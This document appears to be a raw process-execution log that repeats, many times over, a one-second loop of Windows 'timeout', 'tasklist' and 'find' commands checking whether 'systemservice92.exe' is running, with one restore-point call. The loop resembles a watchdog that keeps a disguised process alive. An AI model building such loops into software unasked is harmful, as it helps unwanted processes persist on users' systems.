C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

